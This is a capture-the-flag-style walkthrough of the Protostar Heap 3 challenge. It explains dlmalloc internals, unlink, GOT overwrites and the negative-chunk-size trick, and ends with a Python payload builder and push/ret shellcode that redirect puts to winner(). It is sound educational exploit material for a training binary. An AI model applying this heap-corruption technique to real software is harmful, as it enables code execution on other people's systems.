Protostar Heap 3 Walkthrough

Having previously tackled the last stack challenge in Protostar from Exploit Exercises, we’re now switching to the last heap challenge.

Heap 3 Challenge

Here’s the source code for the Protostar Heap 3 challenge:

The goal is to call the winner() function. As strcpy is used, it is possible to overflow all three of the dynamically allocated buffers, so let’s see what we can do with that.


The heap is used in C programs for dynamic memory management. libc provides an easy-to-use interface (malloc/free) to allocate and de-allocate memory regions. The version of libc in Protostar uses an implementation of malloc called dlmalloc, named after its original creator, Doug Lea. The control structures used by malloc are stored in-band with the data, which allows manipulation of the control structures when a heap buffer overflow is possible, as above.

malloc allocates memory in chunks that have the following structure:

prev_size stores the size of the previous chunk, and size stores the size of the current chunk. Chunk size is always a multiple of 8 bytes for alignment, which means that the 3 lowest bits of the size would always be 0. malloc reuses these three bits as flags; most notably, the least significant bit indicates whether the previous chunk is in use (1) or free (0). So, if we see 0x29 in the size field, the size of the current chunk is 40 (hex 0x28), and the previous chunk is in use. When malloc is called, it initializes prev_size and size and returns the address of the memory right after them (mem in the picture above). The fields depicted as fd and bk are ignored for used chunks, and that memory holds the program data.
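As a quick illustration of the size field described above, here is a minimal Python sketch that splits a raw value into the chunk size and the “previous chunk in use” flag. The helper name decode_size_field is made up for this example, and the three-bit mask simply follows the description in the text.

```python
PREV_INUSE = 0x1   # least significant bit: previous chunk is in use
FLAG_MASK = 0x7    # the three low bits used as flags, per the text

def decode_size_field(raw):
    """Split a raw size field into the chunk size and the PREV_INUSE flag."""
    return {
        "size": raw & ~FLAG_MASK,
        "prev_inuse": bool(raw & PREV_INUSE),
    }

print(decode_size_field(0x29))  # size 40, previous chunk in use
```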

When a chunk is free (i.e. after free was called to de-allocate the chunk), it is stored in a doubly linked list: the fd field contains the address of the next free chunk (forward pointer), and the bk field contains the address of the previous free chunk (backward pointer). These pointers therefore overwrite the beginning of the data in an unused chunk.

This is how malloc_chunk is defined in malloc.c (simplified):
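To make the field offsets concrete, the four fields can be mirrored in a Python ctypes structure. This is only a model of the layout on the 32-bit target, not the malloc.c source: the class name MallocChunk is made up here, and the pointers are represented as 32-bit integers.

```python
import ctypes

class MallocChunk(ctypes.Structure):
    """Model of a 32-bit chunk header; pointers are stored as 32-bit integers."""
    _fields_ = [
        ("prev_size", ctypes.c_uint32),  # size of the previous chunk
        ("size", ctypes.c_uint32),       # size of this chunk plus flag bits
        ("fd", ctypes.c_uint32),         # forward pointer (free chunks only)
        ("bk", ctypes.c_uint32),         # backward pointer (free chunks only)
    ]

print("fd offset:", MallocChunk.fd.offset)
print("bk offset:", MallocChunk.bk.offset)
```

The offsets of fd and bk (8 and 12) are the constants that matter when unlink is discussed.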

Now let’s run the program in a debugger and see how it all works:

We load the program into GDB and set breakpoints after all of the malloc calls, after all of the strcpy calls, and after all of the free calls. Let’s run it:

After malloc we inspect the program’s memory layout to find the location of the heap (0x0804c000) and configure GDB to print the current CPU instruction and 40 32-bit values from the top of the heap every time a breakpoint is reached.

The highlighted portion of the heap is the first allocated chunk. We can see that prev_size is 0, size is 0x29 (40 bytes, and the least significant bit is set to 1 to indicate that the previous chunk is in use), and then 32 bytes of the allocated memory.
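The 40-byte chunk size can be reproduced with a small Python sketch of dlmalloc’s request-to-chunk-size rounding on a 32-bit system. The constants (4-byte size field, 8-byte alignment, 16-byte minimum chunk) and the three 32-byte requests are assumptions based on the numbers quoted in this walkthrough, and chunk_addresses is a helper invented for the example.

```python
SIZE_SZ = 4            # assumed width of the size field on 32-bit
MALLOC_ALIGN_MASK = 7  # chunks are aligned to 8 bytes
MINSIZE = 16           # assumed smallest possible chunk
HEAP_BASE = 0x0804c000 # heap start, from the text

def request2size(req):
    """Round a requested size up to the chunk size that holds it."""
    padded = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(padded, MINSIZE)

def chunk_addresses(requests, base=HEAP_BASE):
    """Addresses of consecutive chunks carved from the start of the heap."""
    addrs, addr = [], base
    for req in requests:
        addrs.append(addr)
        addr += request2size(req)
    return addrs

print(request2size(32))
print([hex(a) for a in chunk_addresses([32, 32, 32])])
```

Under these assumptions the three chunks start at 0x0804c000, 0x0804c028 and 0x0804c050, which matches the addresses seen in the debugger.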

Let’s continue:

We see that strcpy copied the data into the allocated memory (‘A’ is ASCII 0x41, ‘B’ is 0x42, ‘C’ is 0x43).

And now we see something unexpected. Firstly, prev_size is still 0 in all the chunks, but it should contain the size of the previous chunk. Secondly, while fd correctly points to the next free chunk (0x0804c028 for the first chunk, which is the address of the second chunk), bk doesn’t seem to be set. Also, the least significant bit of the size field has not been cleared to indicate that the previous chunk is free. What is going on?

Enter Fastbins

This doesn’t work the way we expected because the allocated buffers are small. When a chunk is smaller than 64 bytes (by default), malloc uses a simplified data structure (fastbin) and ignores prev_size, bk, and the “previous chunk in use” bit.

So why did we talk about all these fields if all the chunks are small? For our exploit code we will need the chunks to be treated as regular chunks by malloc, not as fastbin chunks.


When free is called on a chunk and there are free chunks adjacent to it (i.e. right before or right after), free consolidates them into a larger free chunk. Free chunks are stored in a doubly linked list (ignoring fastbin chunks for now), so during consolidation free removes the adjacent free chunk from the list, as it becomes part of a new, larger chunk. Here’s what happens conceptually (there’s much more code and many edge cases, like checking if the current chunk is the last one in the heap):

The unlinking is done by the unlink macro; here’s a simplified version:

This is called with the chunk to be unlinked as the first argument P, and temporary variables to store pointers to previous and next free chunks as arguments BK and FD. When a chunk is unlinked it makes the next free chunk P->fd and the previous free chunk P->bk point at each other. Here’s a visual:

So unlink basically writes the value of P->bk to the memory at address (P->fd)+12 and the value of P->fd to the memory at address (P->bk)+8. The changed memory is highlighted in blue. If we can control the values of P->fd and P->bk we can overwrite arbitrary memory, with the restriction being that both (P->fd)+12 and (P->bk)+8 have to be writeable.
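The two writes can be simulated in Python with a dictionary standing in for memory. This is only a sketch of the pointer updates described above, not the real macro; the addresses A, P and C are made up, and the offsets 8 and 12 are those of fd and bk on the 32-bit target.

```python
FD_OFFSET = 8   # offset of fd inside a chunk
BK_OFFSET = 12  # offset of bk inside a chunk

def unlink(mem, p):
    """Remove chunk p from the list: FD->bk = BK, then BK->fd = FD."""
    fd = mem[p + FD_OFFSET]
    bk = mem[p + BK_OFFSET]
    mem[fd + BK_OFFSET] = bk
    mem[bk + FD_OFFSET] = fd

# Three free chunks at made-up addresses, linked as A <-> P <-> C.
A, P, C = 0x1000, 0x2000, 0x3000
mem = {
    A + FD_OFFSET: P,
    P + FD_OFFSET: C,
    P + BK_OFFSET: A,
    C + BK_OFFSET: P,
}

unlink(mem, P)
print(hex(mem[A + FD_OFFSET]), hex(mem[C + BK_OFFSET]))  # A and C now point at each other
```

Nothing in unlink checks that fd and bk point at real chunks, which is why controlling them yields a write to a chosen address.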

Global Offset Table

Have a look at the disassembly of main() again. The source code calls printf at the end of main(), but as an optimization the compiler determines that the string is constant and replaces the call with a call to puts at address 0x08048790. Let’s see what it does:

puts is not called directly, but rather through the PLT (Procedure Linkage Table), which jumps to the puts address stored in the GOT (Global Offset Table). This is part of dynamic library linking; here’s a video explanation from LiveOverflow:

We can use the Global Offset Table to redirect the execution flow if we overwrite the address at 0x0804b128.

Our plan is clear now. We’ll store shellcode that calls winner() somewhere on the heap, then force chunk consolidation so that unlink is called on a specially crafted chunk. The chunk will contain 0x0804b11c = (0x0804b128-12) in the fd field and the address of the shellcode in the bk field. We cannot put the address of winner() directly into bk: unlink also updates BK->fd, which would mean writing to the memory at winner()+8, and that part of memory is not writeable.
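The arithmetic behind the plan can be checked with a short Python sketch. The helper unlink_writes is invented for this example; the shellcode address 0x0804c040 is the one that shows up later in the GDB session, and the winner() address is an assumption read from the shellcode bytes quoted further down.

```python
import struct

PUTS_GOT = 0x0804b128        # GOT slot for puts, from the text
SHELLCODE_ADDR = 0x0804c040  # heap address of the shellcode, from the text
WINNER_ADDR = 0x08048864     # assumption: winner(), read from the shellcode bytes
FD_OFFSET, BK_OFFSET = 8, 12

def unlink_writes(fd, bk):
    """Return the two (address, value) writes that unlink performs."""
    return [(fd + BK_OFFSET, bk), (bk + FD_OFFSET, fd)]

fake_fd = PUTS_GOT - BK_OFFSET
packed_fd = struct.pack("<I", fake_fd)  # little-endian bytes for the payload

writes = unlink_writes(fake_fd, SHELLCODE_ADDR)
for addr, value in writes:
    print(hex(addr), "<-", hex(value))

# With winner() in bk, the second write would land inside the code itself.
bad_write_addr = unlink_writes(fake_fd, WINNER_ADDR)[1][0]
print(hex(bad_write_addr))
```

The first write redirects puts; the second one clobbers four bytes at the shellcode address plus 8, so the shellcode has to tolerate that.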

Negative Chunk Size

We need one more little trick explained in the Phrack article linked below — what if we have -4 (0xfffffffc) as the chunk size?

  • When determining whether to use fastbin, malloc is casting the chunk size to unsigned int, so -4 is bigger than 64.
  • The least significant bit of 0xfffffffc is not set, which indicates the previous adjacent chunk is free and unlink will be called for it!
  • The address of the previous adjacent chunk will be calculated by subtracting -4 (i.e. adding 4) from the current chunk’s beginning.
  • The address of the next adjacent chunk will be calculated by adding -4 (i.e. subtracting 4) to the current chunk’s beginning. Its size will also be -4.
  • The value right before the start of the current chunk will be used to determine whether the next adjacent chunk is free. This should be set to an odd number to avoid memory corruption (otherwise unlink will be called for the next adjacent chunk also as part of free chunk consolidation).
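The points above can be checked with 32-bit wraparound arithmetic in Python. This is a sketch under assumptions: the chunk address 0x0804c050 is the fake chunk location given later in the walkthrough, the threshold of 64 is the figure quoted in the text, and u32 is a helper invented to emulate unsigned 32-bit arithmetic.

```python
MASK32 = 0xFFFFFFFF
MAX_FAST = 64          # fastbin threshold quoted in the text

def u32(x):
    """Wrap a Python integer to an unsigned 32-bit value."""
    return x & MASK32

chunk = 0x0804c050     # chunk being freed (from the text)
size = 0xfffffffc      # -4 as an unsigned 32-bit value
prev_size = 0xfffffffc

is_fastbin = size <= MAX_FAST            # unsigned compare: not a fastbin chunk
prev_in_use = bool(size & 1)             # bit clear: previous chunk looks free
prev_chunk = u32(chunk - prev_size)      # subtracting -4 moves 4 bytes forward
next_chunk = u32(chunk + size)           # adding -4 moves 4 bytes back
# The next chunk's "in use" bit is read from the size field of the chunk after it.
inuse_check_addr = u32(next_chunk + size) + 4

print(is_fastbin, prev_in_use)
print(hex(prev_chunk), hex(next_chunk), hex(inuse_check_addr))
```

With these values unlink runs on the fake chunk at 0x0804c054, whose fd and bk sit at 0x0804c05c and 0x0804c060, and the word checked for oddness is the one at 0x0804c04c, right before the chunk being freed.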

If we can get free called on this specially crafted chunk, it will cause the value of puts@GOT to be replaced with the address of our shellcode. Note, the shellcode should either be super short (8 bytes or less), or jump 12 bytes ahead as the memory at “addr of shellcode”+8 will be overwritten by unlink.

Using negative size also takes care of the NULL/0x00 bytes, which we cannot put arbitrarily into our buffers as they will be treated as string terminators.


We just need to call winner():

This assembler snippet should do it:

Assembled, these instructions become "\x68\x64\x88\x04\x08\xc3", which fits into the 8 bytes we have available.
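The same six bytes can be built by hand in Python, which makes the encoding visible: 0x68 is the x86 opcode for push with a 32-bit immediate, and 0xc3 is ret. The winner() address 0x08048864 is read back from the bytes quoted above; it should be checked against the actual binary.

```python
import struct

WINNER_ADDR = 0x08048864  # assumption: taken from the byte string in the text
PUSH_IMM32 = b"\x68"      # x86: push imm32
RET = b"\xc3"             # x86: ret

# push the address of winner(), then "return" into it
shellcode = PUSH_IMM32 + struct.pack("<I", WINNER_ADDR) + RET

print(shellcode.hex())
print(len(shellcode), "bytes")
```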

The Exploit

We’ll use the third buffer for our crafted chunk. We’ll store the shellcode in the middle of the second buffer, and will also use that buffer to overwrite prev_size and size of the last chunk with 0xfffffffc.
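Here is a minimal Python 3 sketch of how the three buffers could be laid out, based on the addresses used in this walkthrough. It is not necessarily the exact script used for this post: build_payloads is a name invented for this example, the second buffer’s data address 0x0804c030 is an assumption (the chunk at 0x0804c028 plus its 8-byte header), and the filler byte 0x41 is chosen because it is odd, so the word right before the third chunk passes the “in use” check.

```python
import struct

PUTS_GOT = 0x0804b128        # GOT slot for puts, from the text
SHELLCODE_ADDR = 0x0804c040  # where the shellcode should land, from the text
B_DATA_ADDR = 0x0804c030     # assumption: start of the second buffer's data
BUF_SIZE = 32                # usable bytes before the third chunk's header
SHELLCODE = b"\x68\x64\x88\x04\x08\xc3"   # push winner; ret
NEG4 = struct.pack("<I", 0xfffffffc)      # -4 as a little-endian word
FILL = b"\x41"               # odd filler byte, contains no NUL

def build_payloads():
    """Return the three program arguments as bytes."""
    a = FILL * 4                                   # first buffer is not used
    b = FILL * (SHELLCODE_ADDR - B_DATA_ADDR)      # pad up to the shellcode
    b += SHELLCODE
    b += FILL * (BUF_SIZE - len(b))                # pad to the end of the buffer
    b += NEG4 + NEG4                               # prev_size and size of chunk 3
    c = FILL * 4                                   # fake chunk starts 4 bytes in
    c += struct.pack("<I", PUTS_GOT - 12)          # fake fd
    c += struct.pack("<I", SHELLCODE_ADDR)         # fake bk
    return a, b, c

a, b, c = build_payloads()
for name, buf in zip("ABC", (a, b, c)):
    print(name, buf.hex())
```

Each buffer would then be written to its own file and passed to heap3 as a separate argument.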

The exploit saves these buffers in files as /tmp/[A,B,C], so heap3 should be called as:

It works! Let’s check it in GDB. We’ll set breakpoints at the first call to free and at the call to puts:

I’ve highlighted the shellcode at address 0x0804c040 and our fake chunk at address 0x0804c050. Let’s continue:

We check that we have correctly updated the puts address in GOT to point to the shellcode. I’ve also highlighted the address after the shellcode that was overwritten by unlink.

Final Thought

It took me a while to figure out how heap exploits work; it seemed like dark magic in the beginning. The fastbin behaviour was also very confusing. I hope this walkthrough helped.


Phrack issue #57, Once upon a free() by anonymous

LiveOverflow Binary Hacking course

Protostar Heap 3 Walkthrough from Joshua Wang
